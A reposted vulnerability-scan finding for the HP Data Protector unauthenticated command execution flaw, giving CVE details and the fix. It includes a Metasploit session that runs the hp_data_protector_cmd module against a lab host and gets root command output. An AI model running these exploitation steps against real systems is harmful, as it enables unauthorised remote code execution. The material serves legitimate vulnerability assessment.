metasploit - HP Data Protector Remote Command Execution
Source: Internet  Editor: 程序博客网  Time: 2024/05/21 19:22
53641 (1) - HP Data Protector Remote Command Execution
Synopsis
The remote service allows remote execution of arbitrary commands without authentication.
Description
The remote HP Data Protector client or server service is affected by a command execution vulnerability. A malicious user can send a specially crafted packet that causes this service to execute an arbitrary shell command with system privileges.
See Also
http://www.zerodayinitiative.com/advisories/ZDI-11-055/
http://archives.neohapsis.com/archives/bugtraq/2011-02/0076.html
http://www.nessus.org/u?6ca03389
Solution
1. Upgrade to Data Protector A.06.20 or later and
2. Enable encrypted control communication services on cell server and all clients in cell.
Risk Factor
Critical
CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score
8.3 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
References
BID: 46234
CVE: CVE-2011-0923
XREF: OSVDB:72526
XREF: EDB-ID:17339
XREF: EDB-ID:17648
XREF: EDB-ID:18521
XREF: EDB-ID:27400
Exploitable with
CANVAS (true), Metasploit (true)
Plugin Information:
Publication date: 2011/05/03, Modification date: 2013/08/08
Hosts
192.168.1.92 (tcp/5555)
Nessus was able to exploit the vulnerability to execute the command
'/usr/bin/id' on the remote host, which produced the following output :
------------------------------ snip ------------------------------
sdp2
uid=0(root) gid=0(root) egid=3(sys) groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users)
sdp2
0
------------------------------ snip ------------------------------
Attack Details
Module options (auxiliary/admin/hp/hp_data_protector_cmd):
   Name   Current Setting            Required  Description
   ----   ---------------            --------  -----------
   CMD    Windows\System32\calc.exe  yes       File to execute
   RHOST                             yes       The target address
   RPORT  5555                       yes       The target port
msf auxiliary(hp_data_protector_cmd) > set CMD /usr/bin/id
CMD => /usr/bin/id
msf auxiliary(hp_data_protector_cmd) > set RHOST 192.168.1.92
RHOST => 192.168.1.92
msf auxiliary(hp_data_protector_cmd) > run
[*] 192.168.1.92:5555 - Sending command...
[*] �15 [12:1] ^B[2004] 1409833427 INET sdp2 uid=0(root) gid=0(root) egid=3(sys) groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users)
sdp2^F6 0
[*] Auxiliary module execution completed